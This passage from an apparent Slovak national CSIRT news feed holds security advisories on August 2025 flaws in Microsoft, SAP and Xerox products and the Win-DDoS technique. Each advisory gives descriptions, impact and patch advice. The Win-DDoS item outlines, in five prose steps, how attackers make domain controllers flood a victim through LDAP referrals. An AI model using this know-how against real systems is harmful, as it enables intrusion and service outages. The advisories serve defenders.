					<description><![CDATA[<p><img src="/wp-content/uploads/2025/12/MicrosoftLogo-4238232498.jpg" alt="" /></p>Spoločnosť Microsoft vydala v auguste 2025 balík opráv pre portfólio svojich produktov opravujúci 107 zraniteľností, z ktorých 13 je označených ako...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/12/MicrosoftLogo-4238232498.jpg" alt="" /></p>
<p><strong>Spoločnosť Microsoft vydala v auguste 2025 balík opráv pre  portfólio svojich produktov opravujúci 107 zraniteľností, z ktorých 13 je označených ako kritické. Opravená bola aj zero-day zraniteľnosť CVE-2025-53779. Jedná sa o chybu relatívnej cesty vo Windows Kerberos, ktorá umožňuje autorizovanému útočníkovi zvýšiť oprávnenia cez sieť ako súčasť útoku nazvaného BadSuccessor. </strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Azure File Sync</li>



<li>Azure OpenAI</li>



<li>Azure Portal</li>



<li>Azure Stack</li>



<li>Azure Virtual Machines</li>



<li>Desktop Windows Manager</li>



<li>GitHub Copilot and Visual Studio</li>



<li>Graphics Kernel</li>



<li>Kernel Streaming WOW Thunk Service Driver</li>



<li>Kernel Transaction Manager</li>



<li>Microsoft 365 Copilot&#8217;s Business Chat</li>



<li>Microsoft Brokering File System</li>



<li>Microsoft Dynamics 365 (on-premises)</li>



<li>Microsoft Edge for Android</li>



<li>Microsoft Exchange Server</li>



<li>Microsoft Graphics Component</li>



<li>Microsoft Office</li>



<li>Microsoft Office Excel</li>



<li>Microsoft Office PowerPoint</li>



<li>Microsoft Office SharePoint</li>



<li>Microsoft Office Visio</li>



<li>Microsoft Office Word</li>



<li>Microsoft Teams</li>



<li>Remote Access Point-to-Point Protocol (PPP) EAP-TLS</li>



<li>Remote Desktop Server</li>



<li>Role: Windows Hyper-V</li>



<li>SQL Server</li>



<li>Storage Port Driver</li>



<li>Web Deploy</li>



<li>Windows Ancillary Function Driver for WinSock</li>



<li>Windows Cloud Files Mini Filter Driver</li>



<li>Windows Connected Devices Platform Service</li>



<li>Windows DirectX</li>



<li>Windows Distributed Transaction Coordinator</li>



<li>Windows File Explorer</li>



<li>Windows GDI+</li>



<li>Windows Installer</li>



<li>Windows Kerberos</li>



<li>Windows Kernel</li>



<li>Windows Local Security Authority Subsystem Service (LSASS)</li>



<li>Windows Media</li>



<li>Windows Message Queuing</li>



<li>Windows NT OS Kernel</li>



<li>Windows NTFS</li>



<li>Windows NTLM</li>



<li>Windows PrintWorkflowUserSvc</li>



<li>Windows Push Notifications</li>



<li>Windows Remote Desktop Services</li>



<li>Windows Routing and Remote Access Service (RRAS)</li>



<li>Windows Security App</li>



<li>Windows SMB</li>



<li>Windows StateRepository API</li>



<li>Windows Subsystem for Linux</li>



<li>Windows Win32K &#8211; GRFX</li>



<li>Windows Win32K &#8211; ICOMP</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2025-50165 </strong>(CVSS 3.1 skóre 9,8)</p>



<p>Zraniteľnosť operačných systémov Windows súvisí s dereferenciou nedôveryhodného ukazovateľa v komponente Graphics, ktorý môže byť spustený špeciálne vytvoreným grafickým obsahom doručeným cez sieť. Na to môže poslúžiť škodlivý súbor JPEG, ktorý môže byť doručený napríklad v dokumente Office. Útočník môže použiť neinicializovaný ukazovateľ funkcie, ktorý sa volá pri dekódovaní obrázka formátu JPEG. Keď zraniteľný systém spracuje tento obsah &#8211; buď automaticky (napr. generovanie náhľadov, obsluha náhľadov) alebo cez interakciu používateľa, zraniteľnosť umožní vykonanie ľubovoľného kódu.</p>



<p><strong>CVE-2025-53766 </strong>(CVSS 3.1 skóre 9,8)</p>



<p>Zraniteľnosť vo Windows GDI+ umožňuje neoprávnenému útočníkovi vzdialene vykonať kód po pretečení haldy. Zraniteľnosť sa dá zneužiť otvorením dokumentu obsahujúceho špeciálne vytvorený metafile. Microsoft vylúčil Preview Pane ak vektor útoku. Kritickou ju robí aj fakt, že každé zariadenie prevádzkujúce vlastnú ASP.NET aplikáciu ponúkajúcu nahrávanie súborov bez bezpečnostnej aktualizácie by mohlo byť zraniteľným.</p>



<p><strong>CVE-2025-53779 </strong>(CVSS 3.1 skóre 7,2) <strong>zero-day</strong></p>



<p>Zraniteľnosť v&nbsp;Kerberos spočíva v&nbsp;možnosti získania prístupu k&nbsp;niektorým atribútom delegovaných spravovaných servisných účtov (dMSA) v Active Directory. To umožní útočníkovi zvýšenie oprávnení na správcu domény. Forma útoku dostala názov BadSuccessor.</p>



<p>Pozn.: Zvyšné zraniteľnosti, ktoré výrobca uvádza ako kritické, <strong>nie sú</strong> rovnako hodnotené podľa CVSS hodnotenia. Spolu Microsoft v&nbsp;aktuálnom balíku Patch Tuesday opravil 107 zraniteľností.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Eskalácia privilégií</strong></li>



<li><strong>Neoprávnený prístup k informáciám</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom a používateľom zraniteľných verzií odporúčame bezodkladne vykonať aktualizácie dostupné priamo zo systému alebo zo <a href="https://msrc.microsoft.com/update-guide/">stránky výrobcu</a>. Pre konkrétny prehľad si treba vo filtroch zvoliť mesiac august a&nbsp;Mode „Update Tuesday“.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://msrc.microsoft.com/update-guide/releaseNote/2025-Aug">https://msrc.microsoft.com/update-guide/releaseNote/2025-Aug</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53779">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53779</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-50165">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-50165</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53766">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53766</a></li>



<li><a href="https://www.helpnetsecurity.com/2025/08/13/microsoft-fixes-badsuccessor-kerberos-vulnerability-cve-2025-53779/">https://www.helpnetsecurity.com/2025/08/13/microsoft-fixes-badsuccessor-kerberos-vulnerability-cve-2025-53779/</a></li>



<li><a href="https://medium.com/seercurity-spotlight/operationalizing-the-badsuccessor-abusing-dmsa-for-domain-privilege-escalation-429cefc36187">https://medium.com/seercurity-spotlight/operationalizing-the-badsuccessor-abusing-dmsa-for-domain-privilege-escalation-429cefc36187</a></li>



<li><a href="https://windowsforum.com/threads/cve-2025-50165-high-risk-windows-graphics-rce-patch-now.377383/">https://windowsforum.com/threads/cve-2025-50165-high-risk-windows-graphics-rce-patch-now.377383/</a></li>



<li><a href="https://www.bleepingcomputer.com/news/microsoft/microsoft-august-2025-patch-tuesday-fixes-one-zero-day-107-flaws/">https://www.bleepingcomputer.com/news/microsoft/microsoft-august-2025-patch-tuesday-fixes-one-zero-day-107-flaws/</a></li>



<li><a href="https://www.darkreading.com/application-security/elevation-privilege-vulns-dominate-microsoft-patches">https://www.darkreading.com/application-security/elevation-privilege-vulns-dominate-microsoft-patches</a></li>



<li><a href="https://www.rapid7.com/blog/post/patch-tuesday-august-2025/">https://www.rapid7.com/blog/post/patch-tuesday-august-2025/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2691/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačný prehľad kritických zraniteľností júl 2025</title>
		<link>/posts/2685</link>
					<comments>/posts/2685#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 14 Aug 2025 15:20:30 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[monthly report]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=2685</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci júl 2025....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>
<p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci júl 2025.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2025/08/2025_07_mesacnik.pdf" data-type="link" data-id="/wp-content/uploads/2024/12/2024_11_mesacnik.pdf">Mesačný prehľad – 07/2025 PDF (601 kB)</a></p>



<p>Prehľady sú spracovávané od októbra 2014 a sú dostupné na <a href="https://csirt.sk/mesacny-prehlad-kritickych-a-zavaznych-softver">tomto odkaze</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2685/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>SAP v augustovom Patch Tuesday opravil viacero kritických a vysoko závažných zraniteľností vo viacerých produktoch</title>
		<link>/posts/2681</link>
					<comments>/posts/2681#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 14 Aug 2025 09:07:08 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[access to sensitive information]]></category>
		<category><![CDATA[Business One]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[Landscape transformation]]></category>
		<category><![CDATA[NetWeaver]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[S/4HANA]]></category>
		<category><![CDATA[SAP]]></category>
		<guid isPermaLink="false">/?p=2681</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/08/sap-se-sap-erp-sap-business-one-sap-hana-png-favpng-YFekjnBUshpDjqh8VwNLHrHzK-1-1024x787.jpg" alt="" /></p>Spoločnosť SAP vydala 12. augusta 2025 bezpečnostné aktualizácie obsahujúce opravy pre 20 zraniteľností. 3 z nich sú hodnotené ako kritické a...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/08/sap-se-sap-erp-sap-business-one-sap-hana-png-favpng-YFekjnBUshpDjqh8VwNLHrHzK-1-1024x787.jpg" alt="" /></p>
<p><strong>Spoločnosť SAP vydala 12. augusta 2025 bezpečnostné aktualizácie obsahujúce opravy pre 20 zraniteľností. 3 z nich sú hodnotené ako kritické a umožňujú injektovanie kódu. 2 vysoko závažné  dovoľujú získať vyššie oprávnenia, obchádzať autorizáciu a injektovať ABAP kód.</strong><br><strong>[Aktualizácia] Jedna z nich je aktívne zneužívaná a existuje pre ňu verejne dostupný exploit.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>SAP S/4HANA (Private Cloud/On-Premise) verzie S4CORE 102, 103, 104, 105, 106, 107, 108</li>



<li>SAP Landscape Transformation (Analysis Platform) verzie DMIS 2011_1_700, 2011_1_710, 2011_1_730, 2011_1_731, 2011_1_752, 2020</li>



<li>SAP Business One (SLD) verzie B1_ON_HANA 10.0, SAP-M-BO 10.0</li>



<li>SAP NetWeaver Application Server ABAP (BIC Document) verzie SAP_APPL 606; SAP_FIN 617, 618, 720, 730; S4CORE 102, 103, 104, 105, 106, 107, 108</li>
</ul>



<p>Pozn.: V ďalších zraniteľných systémoch boli opravené stredne a&nbsp;nízko závažné zraniteľnosti.</p>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-27429, CVE-2025-42957 </strong>(CVSS 3.1 skóre 9,9)</p>



<p>Kritické zraniteľnosti v SAP S/4HANA, ktoré súvisia s nevhodnou kontrolou oprávnení. Zraniteľnosti dovoľujú útočníkom s používateľskými oprávneniami injektovať ľubovoľný ABAP kód cez moduly prístupné na diaľku cez RFC. CVE-2025-27429 predstavuje aktualizáciu pôvodnej zraniteľnosti z apríla 2025.</p>



<p><strong>[Aktualizácia] Zraniteľnosť je aktívne zneužívaná a existuje pre ňu verejne dostupný exploit.</strong></p>



<p><strong>CVE-2025-42950</strong> (CVSS 3.1 skóre 9,9)</p>



<p>Kritická zraniteľnosť v SAP Landscape Transformation (Analysis Platform) súvisí s&nbsp;nevhodnou kontrolou oprávnení. Zraniteľnosť dovoľuje útočníkom s&nbsp;používateľskými oprávneniami injektovať ľubovoľný ABAP kód cez moduly prístupné na diaľku cez RFC.</p>



<p><strong>CVE-2025-42951</strong> (CVSS 3.1 skóre 8,8)</p>



<p>Vysoko závažná zraniteľnosť v SAP Business One (SLD) súvisí z&nbsp;nevhodnou formou autorizácie. Útočník autentifikovaný v&nbsp;natívnom klientovi môže získať prístup k&nbsp;administrátorskému API a získať administrátorské oprávnenia ku databáze.</p>



<p><strong>CVE-2025-42976 </strong>(CVSS 3.1 skóre 8,1)</p>



<p>Označuje viacero zraniteľností v SAP NetWeaver Application Server ABAP (BIC Document) súvisiacich s&nbsp;možnosťou čítať pamäť mimo povolené hodnoty. Autentifikovaný útočník môže spôsobiť poškodenie pamäte zaslaním špeciálne vytvorenej požiadavky na BIC Document, čo mu umožní prístup k&nbsp;informáciám v&nbsp;častiach pamäte, ktoré by nemali byť prístupné. Útočník môže požiadavkami služby aj zahltiť a&nbsp;spôsobiť jej výpadok.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Eskalácia oprávnení</strong></li>



<li><strong>Neoprávnený prístup k citlivým údajom</strong></li>



<li><strong>Nedostupnosť služby (DoS)</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom a používateľom zraniteľných verzií odporúčame bezodkladne vykonať aktualizácie zo <a href="https://support.sap.com/en/my-support/knowledge-base/security-notes-news/august-2025.html">stránky výrobcu</a>. Ak nie je možné aktualizovať zraniteľné systémy, odporúča sa zraniteľné podsystémy deaktivovať.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-27429">https://nvd.nist.gov/vuln/detail/CVE-2025-27429</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-42957">https://nvd.nist.gov/vuln/detail/CVE-2025-42957</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-42950">https://nvd.nist.gov/vuln/detail/CVE-2025-42950</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-42951">https://nvd.nist.gov/vuln/detail/CVE-2025-42951</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-42976">https://nvd.nist.gov/vuln/detail/CVE-2025-42976</a></li>



<li><a href="https://support.sap.com/en/my-support/knowledge-base/security-notes-news/august-2025.html">https://support.sap.com/en/my-support/knowledge-base/security-notes-news/august-2025.html</a></li>



<li><a href="https://onapsis.com/blog/sap-security-notes-august-2025-patch-day/">https://onapsis.com/blog/sap-security-notes-august-2025-patch-day/</a></li>



<li><a href="https://cybersecuritynews.com/sap-security-patch-day/">https://cybersecuritynews.com/sap-security-patch-day/</a></li>



<li><a href="https://securitybridge.com/blog/critical-sap-s-4hana-code-injection-vulnerability-cve-2025-42957/">https://securitybridge.com/blog/critical-sap-s-4hana-code-injection-vulnerability-cve-2025-42957/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2681/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Xerox vydal bezpečnostné záplaty pre vysoko závažné zraniteľnosti</title>
		<link>/posts/2676</link>
					<comments>/posts/2676#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 14 Aug 2025 09:00:09 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[FreeFlow Core]]></category>
		<category><![CDATA[path traversal]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[SSRF]]></category>
		<category><![CDATA[Xerox]]></category>
		<guid isPermaLink="false">/?p=2676</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/08/Xerox-Logo-1024x683.png" alt="" /></p>Spoločnosť Xerox vydala urgentné bezpečnostné varovanie týkajúce sa dvoch kritických zraniteľností v softvéri FreeFlow Core. Tieto zraniteľnosti umožňujú útočníkom vykonať...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/08/Xerox-Logo-1024x683.png" alt="" /></p>
<p><strong>Spoločnosť Xerox vydala urgentné bezpečnostné varovanie týkajúce sa dvoch kritických zraniteľností v softvéri FreeFlow Core. Tieto zraniteľnosti umožňujú útočníkom vykonať útoky Server-Side Request Forgery (SSRF) a vzdialene vykonávať kód.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Xerox FreeFlow Core verzia 8.0.4</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-8355 </strong>(CVSS 3.1 skóre 7,5)</p>



<p>Zraniteľnosť súvisí s nesprávnym spracovaním a&nbsp;sanitizáciou externých entít XML (XXE). Útočník môže túto zraniteľnosť zneužiť vytvorením škodlivého XML obsahujúceho interné URL a&nbsp;vykonanie útokov typuServer-Side Request Forgery.</p>



<p><strong>CVE-2025-8356 </strong>(CVSS 3.1 skóre 9,8)</p>



<p>Kritická zraniteľnosť typu Path Traversal umožňuje útočníkom pristupovať k súborom mimo určeného rozsahu aplikácie manipuláciou parametrov cesty súborov. Jej zneužitie môže viesť k&nbsp;vzdialenému vykonávaniu kódu.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie kódu (RCE)</strong></li>



<li><strong>Server-Side Request Forgery (SSRF)</strong></li>



<li><strong>Neoprávnené prechádzanie adresárovej štruktúry</strong></li>



<li><strong>Únik citlivých údajov</strong></li>



<li><strong>Úplne narušenie dôveryhodnosti služby</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom a používateľom odporúčame vykonať bezodkladnú aktualizáciu zasiahnutých systémov na <strong>FreeFlow Core verziu 8.0.5 </strong>dostupnú na <a href="https://www.support.xerox.com/en-us/product/core/downloads?language=en">stránke výrobcu</a>, ktorá obsahuje opravy pre obe zraniteľnosti.</p>



<p>Navyše odporúčame implementovať striktné overovanie vstupov ako zakázanie spracovávania externého XML kódu či súborov, okrem tých zo zoznamu povolených položiek (whitelist).</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-8355">https://nvd.nist.gov/vuln/detail/CVE-2025-8355</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-8356">https://nvd.nist.gov/vuln/detail/CVE-2025-8356</a></li>



<li><a href="https://securitydocs.business.xerox.com/wp-content/uploads/2025/08/Xerox-Security-Bulletin-025-013-for-Freeflow-Core-8.0.5.pdf">https://securitydocs.business.xerox.com/wp-content/uploads/2025/08/Xerox-Security-Bulletin-025-013-for-Freeflow-Core-8.0.5.pdf</a></li>



<li><a href="https://thecyberexpress.com/xerox-fixes-cve-2025-8355-and-8356/">https://thecyberexpress.com/xerox-fixes-cve-2025-8355-and-8356/</a></li>



<li><a href="https://cyberpress.org/xerox-freeflow-flaws/">https://cyberpress.org/xerox-freeflow-flaws/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2676/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Win-DDoS: Nová technika distribuovaného narušenia dostupnosti služby</title>
		<link>/posts/2655</link>
					<comments>/posts/2655#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 12 Aug 2025 12:52:01 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[Microsoft]]></category>
		<guid isPermaLink="false">/?p=2655</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/MicrosoftLogo-4238232498.jpg" alt="" /></p>Bezpečnostní výskumníci zverejnili na stretnutí DEF CON 33 informácie o&#160;zraniteľnosti CVE-2025-32724, ktorá ohrozuje &#160;verejne dostupné doménové radiče dosiahnuteľné z internetu....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/MicrosoftLogo-4238232498.jpg" alt="" /></p>
<p><strong>Bezpečnostní výskumníci zverejnili na stretnutí DEF CON 33 informácie o&nbsp;zraniteľnosti CVE-2025-32724, ktorá ohrozuje &nbsp;verejne dostupné doménové radiče dosiahnuteľné z internetu. Tie sa vedia efektívne zmeniť na obete, a&nbsp;tiež botov vyvolávajúcich narušenie dostupnosti služby. Zraniteľnosť má povahu zero-click a&nbsp;dovoľuje útočníkovi spôsobiť narušenie služby bez nákladnej alebo špecializovanej sady nástrojov.</strong><strong></strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<p>Windows doménové radiče so službou Active Directory Domain Service</p>



<ul>
<li>Windows 10 for 32-bit Systems</li>



<li>Windows 10 for x64-based Systems</li>



<li>Windows 10 Version 1607 for 32-bit Systems</li>



<li>Windows 10 Version 1607 for x64-based Systems</li>



<li>Windows 10 Version 1809 for 32-bit Systems</li>



<li>Windows 10 Version 1809 for x64-based Systems</li>



<li>Windows 10 Version 21H2 for 32-bit Systems</li>



<li>Windows 10 Version 21H2 for ARM64-based Systems</li>



<li>Windows 10 Version 21H2 for x64-based Systems</li>



<li>Windows 10 Version 22H2 for 32-bit Systems</li>



<li>Windows 10 Version 22H2 for ARM64-based Systems</li>



<li>Windows 10 Version 22H2 for x64-based Systems</li>



<li>Windows 11 Version 22H2 for ARM64-based Systems</li>



<li>Windows 11 Version 22H2 for x64-based Systems</li>



<li>Windows 11 Version 23H2 for ARM64-based Systems</li>



<li>Windows 11 Version 23H2 for x64-based Systems</li>



<li>Windows 11 Version 24H2 for ARM64-based Systems</li>



<li>Windows 11 Version 24H2 for x64-based Systems</li>



<li>Windows Server 2008 for 32-bit Systems Service Pack 2</li>



<li>Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)</li>



<li>Windows Server 2008 for x64-based Systems Service Pack 2</li>



<li>Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)</li>



<li>Windows Server 2008 R2 for x64-based Systems Service Pack 1</li>



<li>Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)</li>



<li>Windows Server 2012</li>



<li>Windows Server 2012 (Server Core installation)</li>



<li>Windows Server 2012 R2</li>



<li>Windows Server 2012 R2 (Server Core installation)</li>



<li>Windows Server 2016</li>



<li>Windows Server 2016 (Server Core installation)</li>



<li>Windows Server 2019</li>



<li>Windows Server 2019 (Server Core installation)</li>



<li>Windows Server 2022</li>



<li>Windows Server 2022 (Server Core installation)</li>



<li>Windows Server 2022, 23H2 Edition (Server Core installation)</li>



<li>Windows Server 2025</li>



<li>Windows Server 2025 (Server Core installation)</li>
</ul>



<p><strong>Opis zraniteľností:</strong></p>



<p><strong>CVE-2025-32724 </strong>(CVSS 3.1 skóre 7,5)</p>



<p>Klientsky kód LDAP nemal žiadne limity na veľkosť zoznamov referral a uvoľňoval pamäť až po dokončení celého procesu. Exploit Win-DDoS zneužíva tieto vlastnosti na manipuláciu URL dopytov na nasmerovanie doménového radiča na server obete.</p>



<ol>
<li>Útočník pošle volanie RPC na doménové radiče, ktoré ich prinúti stať sa CLDAP klientmi.</li>



<li>DC pošlú požiadavku CLDAP na útočníkov CLDAP server, ktorý vráti odpoveď s odkazom (referral response).</li>



<li>DC pošlú dopyt LDAP na LDAP server útočníka cez protokol TCP.</li>



<li>Útočníkov LDAP server odpovie dlhým zoznamom LDAP referenčných URL adries, ktoré všetky smerujú na IP adresu obete.</li>



<li>DC opakovane posielajú dopyty LDAP na daný port, čím zahltia cieľový server.</li>
</ol>



<p>Doménové radiče sa domnievajú, že vykonávajú legitímne dopyty LDAP ale v skutočnosti zahlcujú server obete opakovanými požiadavkami.</p>



<p>Technicky podobné sú aj zraniteľnosti <strong>CVE-2025-26673 </strong>(CVSS 3.1 skóre 7,5), <strong>CVE-2025-49716</strong> (CVSS 3.1 skóre 7,5) a <strong>CVE-2025-49722 </strong>(CVSS 3.1 skóre 5,7).</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Zneprístupnenie služby (DoS)</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom zraniteľných systémov odporúčame bezodkladne vykonať aktualizácie vydané 10. júna. Konkrétne na:</p>



<ul>
<li>Windows Server 2016 Security Update 10.0.14393.8148</li>



<li>Windows 10 Version 1607 for x64-based Systems Security Update 10.0.14393.8148</li>



<li>Windows 10 Version 1607 for 32-bit Systems Security Update 10.0.14393.8148</li>



<li>Windows 10 for x64-based Systems Security Update 10.0.10240.21034</li>



<li>Windows 10 for 32-bit Systems Security Update 10.0.10240.21034</li>



<li>Windows Server 2025Security Update 10.0.26100.4349</li>



<li>Windows Server 2025SecurityHotpatchUpdate 10.0.26100.4270</li>



<li>Windows 11 Version 24H2 for x64-based Systems Security Update 10.0.26100.4349</li>



<li>Windows 11 Version 24H2 for x64-based Systems SecurityHotpatchUpdate 10.0.26100.4270</li>



<li>Windows 11 Version 24H2 for ARM64-based Systems Security Update10.0.26100.4349</li>



<li>Windows 11 Version 24H2 for ARM64-based Systems SecurityHotpatchUpdate 10.0.26100.4270</li>



<li>Windows Server 2012 R2 (Server Core installation) Monthly Rollup 6.3.9600.22620</li>



<li>Windows Server 2012 R2 Monthly Rollup 6.3.9600.22620</li>



<li>Windows Server 2012 (Server Core installation)Monthly Rollup6.2.9200.25522</li>



<li>Windows Server 2012Monthly Rollup6.2.9200.25522</li>



<li>Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)Monthly Rollup6.1.7601.27769</li>



<li>Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)Security Only6.1.7601.27769</li>



<li>Windows Server 2008 R2 for x64-based Systems Service Pack 1Monthly Rollup6.1.7601.27769</li>



<li>Windows Server 2008 R2 for x64-based Systems Service Pack 1Security Only6.1.7601.27769</li>



<li>Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)Monthly Rollup6.0.6003.23351</li>



<li>Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)Security Only6.0.6003.23351</li>



<li>Windows Server 2008 for x64-based Systems Service Pack 2Monthly Rollup6.0.6003.23351</li>



<li>Windows Server 2008 for x64-based Systems Service Pack 2Security Only6.0.6003.23351</li>



<li>Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)Monthly Rollup6.0.6003.23351</li>



<li>Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)Security Only6.0.6003.23351</li>



<li>Windows Server 2022, 23H2 Edition (Server Core installation)Security Update10.0.25398.1665</li>



<li>Windows 11 Version 23H2 for x64-based Systems Security Update10.0.22631.5472</li>



<li>Windows 11 Version 23H2 for ARM64-based Systems Security Update10.0.22631.5472</li>



<li>Windows Server 2025 (Server Core installation)Security Update10.0.26100.4349</li>



<li>Windows Server 2025 (Server Core installation)SecurityHotpatchUpdate10.0.26100.4270</li>



<li>Windows 10 Version 22H2 for 32-bit Systems Security Update10.0.19045.5965</li>



<li>Windows 10 Version 22H2 for ARM64-based Systems Security Update10.0.19045.5965</li>



<li>Windows 10 Version 22H2 for x64-based Systems Security Update10.0.19045.5965</li>



<li>Windows 11 Version 22H2 for x64-based Systems Security Update10.0.22621.5472</li>



<li>Windows 11 Version 22H2 for ARM64-based Systems Security Update10.0.22621.5472</li>



<li>Windows 10 Version 21H2 for x64-based Systems Security Update10.0.19044.5965</li>



<li>Windows 10 Version 21H2 for ARM64-based Systems Security Update10.0.19044.5965</li>



<li>Windows 10 Version 21H2 for 32-bit Systems Security Update10.0.19044.5965</li>



<li>Windows Server 2022 (Server Core installation)Security Update10.0.20348.3807</li>



<li>Windows Server 2022 (Server Core installation)SecurityHotpatchUpdate10.0.20348.3745</li>



<li>Windows Server 2022Security Update10.0.20348.3807</li>



<li>Windows Server 2022SecurityHotpatchUpdate10.0.20348.3745</li>



<li>Windows Server 2019 (Server Core installation)Security Update10.0.17763.7434</li>



<li>Windows Server 2019Security Update10.0.17763.7434</li>



<li>Windows 10 Version 1809 for x64-based Systems Security Update10.0.17763.7434</li>



<li>Windows 10 Version 1809 for 32-bit Systems Security Update10.0.17763.7434</li>
</ul>



<p>Pozn.: Aj zvyšné zraniteľnosti spomenuté v&nbsp;opise zraniteľností už majú dostupné bezpečnostné záplaty.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26673">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26673</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-32724">https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-32724</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49716">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49716</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49722">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49722</a></li>



<li><a href="https://thehackernews.com/2025/08/new-win-ddos-flaws-let-attackers-turn.html">https://thehackernews.com/2025/08/new-win-ddos-flaws-let-attackers-turn.html</a></li>



